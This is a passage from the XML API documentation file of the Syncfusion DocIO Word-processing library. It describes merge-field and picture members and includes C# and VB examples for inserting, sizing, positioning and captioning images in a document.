            <param name="filedValue"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WMergeField.UpdateFieldCode(System.String)">
            <summary>
            updates field code
            </summary>
            <param name="fieldCode"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WMergeField.ApplyBaseFormat">
            <summary>
            Applies the base format.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WMergeField.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WMergeField.UpdateFieldMarks">
            <summary>
            Update field marks when its a cloned field and it field mark refers the other field
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WMergeField.ParseFieldName(System.String)">
            <summary>
            Parses the name of the field.
            </summary>
            <param name="fieldName">Name of the field.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WMergeField.ParseFieldNameUsingRegex(System.String)">
            <summary>
            Parse Field Name using regular expression
            </summary>
            <param name="fieldName">field name</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WMergeField.ParseFieldNameHavingGroupExpression(System.String)">
            <summary>
            Parses field name having group ":" and backslash "\" expression
            </summary>
            <param name="fieldName">field name</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WMergeField.GetInstructionText">
            <summary>
            Serialize the merge field codes.
            </summary>
            <param name="mergeField"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WMergeField.GetTextFormat(Syncfusion.DocIO.DLS.TextFormat)">
            <summary>
            Gets the text format.
            </summary>
            <param name="format">The format.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WMergeField.ClearStringFromOtherCharacters(System.String)">
            <summary>
            Clears the string from other characters.
            </summary>
            <param name="value">The value.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WMergeField.UpdateFieldValue(System.String)">
            <summary>
            Updates field value and format string (merge formats) by parsing through field code
            </summary>
            <param name="fieldCode"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WMergeField.ParseSwitches(System.String)">
            <summary>
            Parse switches (Text format, Number format and Date format)
            </summary>
            <param name="currValue">merge format</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WMergeField.UpdateFieldValue(System.String,System.Collections.Generic.List{System.Int32},System.String)">
            <summary>
            Updates field Value by removing parsed switches using format index collection
            </summary>
            <param name="fieldValue">field value</param>
            <param name="formatIndex">format index</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WMergeField.UpdateFormatIndexAndFieldValue(System.String,System.Collections.Generic.List{System.Int32}@,System.String)">
            <summary>
            Updates format Index and Field value
            </summary>
            <param name="fieldvalue">Field Value</param>
            <param name="formatIndex">Format Index (list)</param>
            <param name="mergeSwitch">Merge Switch</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WMergeField.UpdateSwitchesIndexInFieldValue(System.String)">
            <summary>
            Updates Switches index in Field Codes by removing the extra characters ('\\') present in field codes.
            </summary>
            <param name="fieldValue">Field value</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WMergeField.UpdateMergeFieldResult">
            <summary>
            Upates the merge field result.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WMergeField.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WMergeField.FieldName">
            <summary>
            Gets or sets mail merge field name.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WMergeField.TextBefore">
            <summary>
            Gets or sets the text that is displayed before the merge field.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WMergeField.TextAfter">
            <summary>
            Gets or sets the text that is displayed after the merge field.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WMergeField.Prefix">
            <summary>
            Gets the prefix of merge field. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WMergeField.NumberFormat">
            <summary>
            Gets the number format of the merge field. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WMergeField.DateFormat">
            <summary>
            Gets the date format of the merge field. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WMergeField.TextItems">
            <summary>
            Gets the result text items in the merge field. Read-only.
            </summary>
            <value>The text item collection that represents the merge field result value.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WPicture">
            <summary>
            Represents the picture in the Word document.
            </summary>
            <example>
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("This paragraph has picture. ");
                //Append new picture to the paragraph
                IWPicture picture = paragraph.AppendPicture(Image.FromFile("Image.png"));            
                //Set width and height for the paragraph
                picture.Width = 150;
                picture.Height = 100;
                //Set text wrapping style � When the wrapping style is inline the images will not be absolutely positioned. It will be added next to the textrange.
                picture.TextWrappingStyle = TextWrappingStyle.Square;
                picture.TextWrappingType = TextWrappingType.Largest;
                //Set horizontal and vertical origin
                picture.HorizontalOrigin = HorizontalOrigin.Page;
                picture.VerticalOrigin = VerticalOrigin.Paragraph;
                //Set horizontal and vertical position for the picture
                picture.HorizontalPosition = 200;
                picture.VerticalPosition = 150;
                //Set horizontal and vertical alignments
                picture.HorizontalAlignment = ShapeHorizontalAlignment.Center;
                picture.VerticalAlignment = ShapeVerticalAlignment.Bottom;
                //Set name, title, alternate text.
                picture.Title = "PictureTitle";
                picture.Name = "PictureName";
                picture.IsBelowText = true;            
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("This paragraph has picture. ")
                'Append new picture to the paragraph
                Dim picture As IWPicture = paragraph.AppendPicture(Image.FromFile("Image.png"))
                'Set width and height for the paragraph
                picture.Width = 150
                picture.Height = 100
                'Set text wrapping style � When the wrapping style is inline the images will not be absolutely positioned. It will be added next to the textrange.
                picture.TextWrappingStyle = TextWrappingStyle.Square
                picture.TextWrappingType = TextWrappingType.Largest
                'Set horizontal and vertical origin
                picture.HorizontalOrigin = HorizontalOrigin.Page
                picture.VerticalOrigin = VerticalOrigin.Paragraph
                'Set horizontal and vertical position for the picture
                picture.HorizontalPosition = 200
                picture.VerticalPosition = 150
                'Set horizontal and vertical alignments
                picture.HorizontalAlignment = ShapeHorizontalAlignment.Center
                picture.VerticalAlignment = ShapeVerticalAlignment.Bottom
                'Set name, title, alternate text.
                picture.Title = "PictureTitle"
                picture.Name = "PictureName"
                picture.IsBelowText = True
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPicture.m_size">
            <summary>
            Size of the picture.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPicture.m_widthScale">
            <summary>
             in percent
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPicture.m_heightScale">
            <summary>
             in percent
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPicture.m_horizontalOrigin">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPicture.m_shapePosition">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPicture.m_verticalOrigin">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPicture.m_horizPosition">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPicture.m_vertPosition">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPicture.m_DistanceFromBottom">
            <summary>
            DistanceBottom	Returns or sets the distance (in points) between the document text and the bottom edge of the text-free area surrounding the specified shape. Read/write Single.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPicture.m_DistanceFromLeft">
            <summary>
            DistanceLeft	Returns or sets the distance (in points) between the document text and the left edge of the text-free area surrounding the specified shape. Read/write Single.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPicture.m_DistanceFromRight">
            <summary>
            DistanceRight	Returns or sets the distance (in points) between the document text and the right edge of the text-free area surrounding the specified shape. Read/write Single.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPicture.m_DistanceFromTop">
            <summary>
            DistanceTop	Returns or sets the distance (in points) between the document text and the top edge of the text-free area surrounding the specified shape. Read/write Single.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPicture.m_wrappingStyle">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPicture.m_wrappingType">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPicture.m_horAlignment">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPicture.m_vertAlignment">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPicture.m_spid">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPicture.m_inlinePictureShape">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPicture.m_docxProps">
            <summary>
            Holds additional docx picture props
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPicture.m_altText">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPicture.m_title">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPicture.m_embedBody">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WPicture.m_orderIndex">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WPicture"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.LoadImage(System.Byte[])">
            <summary>
            Loads the image from the specified byte array.
            </summary>
            <param name="imageBytes">The byte array that specifies the image as bytes.</param>
            <example>
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Get the image and convert to byte array
                Image image = Image.FromFile("Image.png");
                MemoryStream imageStream = new MemoryStream();
                image.Save(imageStream, System.Drawing.Imaging.ImageFormat.Png);
                byte[] imageBytes = imageStream.ToArray();
                //Initialize new picture
                WPicture picture = new WPicture(document);
                //Load image from the byte array
                picture.LoadImage(imageBytes);
                //Set width and height
                picture.Height = 100;
                picture.Width = 150;
                //Add picture to the paragraph
                paragraph.Items.Add(picture);
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Get the image and convert to byte array
                Dim image__1 As Image = Image.FromFile("Image.png")
                Dim imageStream As New MemoryStream()
                image__1.Save(imageStream, System.Drawing.Imaging.ImageFormat.Png)
                Dim imageBytes As Byte() = imageStream.ToArray()
                'Initialize new picture
                Dim picture As New WPicture(document)
                'Load image from the byte array
                picture.LoadImage(imageBytes)
                'Set width and height
                picture.Height = 100
                picture.Width = 150
                'Add picture to the paragraph
                paragraph.Items.Add(picture)
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.LoadImage(System.Drawing.Image)">
            <summary>
            Loads the image from the specified <see cref="T:System.Drawing.Image"/> instance.
            </summary>
            <param name="image">The <see cref="T:System.Drawing.Image"/> instance.</param>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform and Xamarin platforms.</remarks>
            <example>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Initialize new picture
                WPicture picture = new WPicture(document);
                //Load image from the file
                picture.LoadImage(Image.FromFile("Image.png"));
                //Set width and height
                picture.Height = 100;
                picture.Width = 150;
                //Add picture to the paragraph
                paragraph.Items.Add(picture);
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Initialize new picture
                Dim picture As New WPicture(document)
                'Load image from the file
                picture.LoadImage(Image.FromFile("Image.png"))
                'Set width and height
                picture.Height = 100
                picture.Width = 150
                'Add picture to the paragraph
                paragraph.Items.Add(picture)
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.UpdateBlipImageRecord">
            <summary>
            Update Blip ImageRecord
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.AddCaption(System.String,Syncfusion.DocIO.CaptionNumberingFormat,Syncfusion.DocIO.CaptionPosition)">
            <summary>
            Adds caption for the current picture with specified name, caption format and caption position.
            </summary>
            <param name="name">The <b>string </b>that specifies the name.</param> 
            <param name="format">The <see cref="T:Syncfusion.DocIO.CaptionNumberingFormat"/> member that specifies the format for caption numbering.</param>
            <param name="captionPosition">The <see cref="T:Syncfusion.DocIO.CaptionPosition"/> member that specifies the position of caption.</param>
            <returns>The paragraph instance with the specified caption.</returns>
            <example>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("This paragraph has picture. ");
                //Append new picture to the paragraph
                IWPicture picture = paragraph.AppendPicture(Image.FromFile("Image.png"));            
                //Set width and height for the paragraph
                picture.Width = 150;
                picture.Height = 100;            
                //Set caption for picture
                picture.AddCaption("Figure 1.1", CaptionNumberingFormat.Number, CaptionPosition.AboveImage);
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("This paragraph has picture. ")
                'Append new picture to the paragraph
                Dim picture As IWPicture = paragraph.AppendPicture(Image.FromFile("Image.png"))
                'Set width and height for the paragraph
                picture.Width = 150
                picture.Height = 100
                'Set caption for picture
                picture.AddCaption("Figure 1.1", CaptionNumberingFormat.Number, CaptionPosition.AboveImage)
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.AddSelf">
            <summary>
            Adds the self.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.CloneImpl">
            <summary>
            Creates a duplicate copy of the entity.
            <exclude/>
            </summary>
            <returns>An <see cref="T:System.Object"/> reference to the newly created instance.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            
            </summary>
            <param name="doc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.WriteXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentWriter)">
            <summary>
            Writes object data as inside xml element.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.ReadXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentReader"/> object.</param>
            <returns>The value indicating the presence of xml content.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.Close">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.SetWidthScale(System.Single)">
            <summary>
            Sets the width scale, specific for parsers.
            </summary>
            <param name="value">The width scale.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.SetHeightScale(System.Single)">
            <summary>
            Sets the height scale, specific for parsers.
            </summary>
            <param name="value">The height scale.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.SetTextWrappingStyle(Syncfusion.DocIO.DLS.TextWrappingStyle)">
             <summary>
            Sets the TextWrappingStyle,specific for parsers.
             </summary>
             <param name="TextWrapStyle">TextWrapStyle</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.Detach">
            <summary>
            Detaches from owner.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.IsPreviousItemIsOleObject">
            <summary>
            To identify current picture previous sibling's previous sibling is OleObject
            </summary>
            <returns><c>true</c>if the current picture previous sibling's previous sibling is OleObject;Otherwise<c>false</c></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.LoadImage(System.Byte[],System.Boolean)">
            <summary>
            Loads the image.
            </summary>
            <param name="imageBytes">The image bytes.</param>
            <param name="isMetafile">if it specifies a metafile, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.LoadImage(Syncfusion.DocIO.DLS.ImageRecord)">
            <summary>
            Loads the image.
            </summary>
            <param name="imageRecord">The image record.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.GetImageForPartialTrustMode(System.Byte[])">
            <summary>
            Gets the image for partial trust mode.
            </summary>
            <param name="imageBytes">The image bytes.</param>
            <returns></returns>
            <exception cref="T:System.ArgumentException">Argument is not image byte array</exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.ConvertSizeForPartialTrustMode(Syncfusion.DocIO.DLS.Entities.Image)">
            <summary>
            Converts the size for partial trust mode.
            </summary>
            <param name="image">The image.</param>
            <returns></returns>
            <exception cref="T:System.ArgumentNullException">image</exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.GetImage(System.Byte[])">
            <summary>
            Gets the image.
            </summary>
            <param name="imageBytes">The image bytes.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.GetEnhMetaFileBits(System.Int32,System.Int32,System.Byte[])">
            <summary>
            Retrieves the contents of the specified enhanced-format metafile and copies them into a buffer.
            </summary>
            <param name="hemf">A handle to the enhanced metafile.</param>
            <param name="cbBuffer">The size, in bytes, of the buffer to receive the data.</param>
            <param name="lpbBuffer">A pointer to a buffer that receives the metafile data. The buffer must be sufficiently large to contain the data. 
            If lpbBuffer is <b>NULL</b>, the function returns the size necessary to hold the data.</param>
            <returns><para>If the function succeeds and the buffer pointer is <b>NULL</b>, the return value is the size of the enhanced metafile, in bytes.</para>
            <para>If the function succeeds and the buffer pointer is a valid pointer, the return value is the number of bytes copied to the buffer.</para>
            <para>If the function fails, the return value is zero.</para>
            </returns>
            <remarks>The <see cref="M:Syncfusion.DocIO.DLS.WPicture.GetEnhMetaFileBits(System.Int32,System.Int32,System.Byte[])"/> does not invalidate the enhanced-metafile handle. 
            The application must call the <see cref="M:Syncfusion.DocIO.DLS.WPicture.DeleteEnhMetaFile(System.IntPtr)"/> function to delete the handle when it is no longer needed.</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.DeleteEnhMetaFile(System.IntPtr)">
            <summary>
            Deletes an enhanced-format metafile or an enhanced-format metafile handle.
            </summary>
            <param name="hemf">A handle to an enhanced metafile.</param>
            <returns>If the function succeeds, the return value is nonzero. If the function fails, the return value is zero.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.LoadBitmap(System.Drawing.Image)">
            <summary>
            
            </summary>
            <param name="image"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.ConvertBitmap(System.Drawing.Image)">
            <summary>
            Converts the .tiff format to .png. Tiff format is not supported by Word 2000. 
            </summary>
            <param name="image">The image.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.ResetImageData">
            <summary>
            Resets the data.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.Syncfusion#Layouting#IWidget#InitLayoutInfo">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.Syncfusion#Layouting#ILeafWidget#Measure(Syncfusion.DocIO.Rendering.DrawingContext)">
            <summary>
            
            </summary>
            <param name="cg"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.CreateLayoutInfo">
            <summary>
            Creates layout information.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.ConvertSize(System.Drawing.Image)">
            <summary>
            Converts size of the image to point units.
            </summary>
            <param name="image">Image object.</param>
            <returns>Size of the image int points.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.CheckPicSizeForPartialTrustMode(Syncfusion.DocIO.DLS.Entities.Image)">
            <summary>
            Checks the pic size for partial trust mode.
            </summary>
            <param name="image">The image.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WPicture.CheckPicSize(System.Drawing.Image)">
            <summary>
            Checks the size of the picture.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.FillRectangle">
            <summary>
            it hold the picture rectangle value
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.HasBorder">
            <summary>
            Gets a value indicating whether this instance has borders.
            </summary>
            <value>
            	<c>true</c> if this instance has borders; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.EntityType">
            <summary>
            Gets the type of the entity. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.Height">
            <summary>
            Gets or sets the picture height in points
            </summary>
            <value>The <b>float</b> that specifies the height.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.Width">
            <summary>
            Gets or sets the picture width in points.
            </summary>
            <value>The <b>float</b> that specifies the width.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.HeightScale">
            <summary>
            Gets or sets the picture height scale factor in percent.
            </summary>
            <value>The <b>float</b> that specifies the height scale factor.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.WidthScale">
            <summary>
            Gets or sets the picture width scale factor in percent.
            </summary>
            <value>The <b>float</b> that specifies the width scale factor.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.LockAspectRatio">
            <summary>
            Gets or sets a value indicating whether the pictute has Lock aspect ratio. The default is <b>false</b>.
            </summary>
            <value>
            	<c>true</c> if this instance has lock aspect ratio; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.ImageForPartialTrustMode">
            <summary>
            Gets the image for partial trust mode.
            </summary>
            <value>
            The image for partial trust mode.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.Image">
            <summary>
            Gets the <see cref="T:System.Drawing.Image"/> instance that represents the picture. Read-only.
            </summary>
            <value>The <see cref="T:System.Drawing.Image"/> instance.</value>
            <remarks>This property is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform, MVC6 and Xamarin platforms.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.ImageBytes">
            <summary>
            Gets the image as byte array. Read-only.
            </summary>
            <value>The <see cref="T:System.Byte"/> array that represents image bytes.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.ImageRecord">
            <summary>
            Gets the image record.
            </summary>
            <value>The image record.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.Position">
            <summary>
            Get/Set Shapeposition
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.HorizontalOrigin">
            <summary>
            Gets or sets the horizontal origin of the picture.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.HorizontalOrigin"/> member that specifies the horizontal origin.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.VerticalOrigin">
            <summary>
            Gets or sets the vertical origin of the picture.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.VerticalOrigin"/> member that specifies the vertical origin.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.HorizontalPosition">
            <summary>
            Gets or sets absolute horizontal position of the picture in points.
            </summary>
            <value>The <b>float </b> that specifies the horizontal position.</value>
            <remarks>
            The horizontal position is relative to the <see cref="P:Syncfusion.DocIO.DLS.WPicture.HorizontalOrigin"/>.
            </remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.VerticalPosition">
            <summary>
            Gets or sets absolute vertical position of the picture in points.
            </summary>
            <value>The <b>float </b> that specifies the vertical position.</value>
            <remarks>
            The vertical position is relative to the <see cref="P:Syncfusion.DocIO.DLS.WPicture.VerticalOrigin"/>.
            </remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.DistanceFromBottom">
            <summary>
            DistanceBottom	Returns or sets the distance (in points) between the document text and the bottom edge of the text-free area surrounding the specified shape. Read/write Single.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.DistanceFromLeft">
            <summary>
            DistanceLeft	Returns or sets the distance (in points) between the document text and the left edge of the text-free area surrounding the specified shape. Read/write Single.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.DistanceFromRight">
            <summary>
            DistanceRight	Returns or sets the distance (in points) between the document text and the right edge of the text-free area surrounding the specified shape. Read/write Single.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.DistanceFromTop">
            <summary>
            DistanceTop	Returns or sets the distance (in points) between the document text and the top edge of the text-free area surrounding the specified shape. Read/write Single.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.TextWrappingStyle">
            <summary>
            Gets or sets the text wrapping style of the picture.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.TextWrappingStyle"/> member that specifies the text wrapping style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.TextWrappingType">
            <summary>
            Gets or sets the text wrapping type of the picture.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.TextWrappingType"/> member that specifies the text wrapping type.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.HorizontalAlignment">
            <summary>
            Gets or sets the horizontal alignment of the picture.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.ShapeHorizontalAlignment"/> member that specifies the horizontal alignment.</value>
            <remarks>
            If the alignment is set as None, then the picture is explicitly positioned using position properties. 
            Otherwise it is positioned according to the alignment specified. The position of the object is relative to <see cref="P:Syncfusion.DocIO.DLS.WPicture.HorizontalOrigin"/>.
            </remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WPicture.VerticalAlignment">
            <summary>
            Gets or sets the vertical alignment of the picture.
            </summary>
            <remarks>
            If the alignment is set as None, then the picture is explicitly positioned using position properties. 
